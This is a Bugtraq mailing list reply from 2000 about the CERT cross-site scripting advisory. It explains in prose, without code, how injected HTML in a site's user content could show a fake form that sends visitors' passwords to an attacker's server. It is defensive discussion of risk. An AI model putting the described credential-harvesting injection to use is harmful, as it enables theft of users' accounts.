Bugtraq mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: regs () NEBCORP COM (Ari Gordon-Schlosberg)
Date: Thu, 3 Feb 2000 14:17:12 -0600
[Shockro () AOL COM]
I'm curious as to how this could be used in a malicious manner, as opposed to just being an annoyance. I mean, god forbid, people should execute arbitrary javascript on us. Yes, we've all seen the file upload form exploit and the 1001 ways to crash Internet Explorer through infinite loops, but there's nothing seriously harmful about this, am I right? Please correct me if I'm wrong.
Yes, you are wrong. :) Let me explain: the javascript issue is not a huge one, although there are some issues. I don't know enough about javascript to get into it. I think the best example of where this could be a problem would on a site like amazon.com. If I can inject HTML into my customer review, I can start reaping passwords or credit card numbers. By studying the format of the amazon HTML, I can make it look like I inserted some sort of prize form into the web page: I ask for their username and password and they press submit... that then posts to a cgi on my server. Boom! I have their account. Or I embed an applet, the net result being the same. This is a real issue. Basically, it boils down the fact that most users will assume that any HTML/Applet/form/script that shows up on a foo.com webpage was authored by someone at foo.com, and any information that they send via their web browser will be going to and only to foo.com. Injection of an attacker's HTML into a a foo.com webpage can exploit this assumption to steal sensitive information. -- Ari there is no spoon ------------------------------------------------------------------------- http://www.nebcorp.com/~regs/pgp for PGP public key
Current thread:
- Re: Bypass Virus Checking Russ Johnson (Jan 31)
- <Possible follow-ups>
- Re: Bypass Virus Checking Max Vision (Jan 31)
- Re: Bypass Virus Checking Martin Bene (Feb 02)
- Re: Bypass Virus Checking Bacano (Feb 01)
- Re: Bypass Virus Checking Brad Griffin (Feb 01)
- Re: Bypass Virus Checking Vladimir Dubrovin (Feb 02)
- Re: Bypass Virus Checking Brock Sides (Feb 01)
- Re: Bypass Virus Checking salme () US IBM COM (Feb 01)
- Fwd: CERT Advisory CA-2000-02 Shockro () AOL COM (Feb 02)
- Re: Fwd: CERT Advisory CA-2000-02 fury (Feb 03)
- Re: Fwd: CERT Advisory CA-2000-02 Ari Gordon-Schlosberg (Feb 03)
- Re: Fwd: CERT Advisory CA-2000-02 Marc Slemko (Feb 03)
- Re: Fwd: CERT Advisory CA-2000-02 Henrik Nordstrom (Feb 05)
- Re: Fwd: CERT Advisory CA-2000-02 Byron Alley (Feb 07)
- Re: Fwd: CERT Advisory CA-2000-02 Len Budney (Feb 08)
- Novell GroupWise 5.5 Enhancement Pack Web Access Denial of Servic e Adam Gray (Feb 07)
- Fwd: CERT Advisory CA-2000-02 Shockro () AOL COM (Feb 02)
- Re: Fwd: CERT Advisory CA-2000-02 Henri Torgemane (Feb 03)
- recent 'cross site scripting' CERT advisory Tim Hollebeek (Feb 04)
- Re: recent 'cross site scripting' CERT advisory Marc Slemko (Feb 05)
- Re: recent 'cross site scripting' CERT advisory Manuel Martin (Feb 08)
- Novell BorderManager 3.5 Remote Slow Death Chicken Man (Feb 08)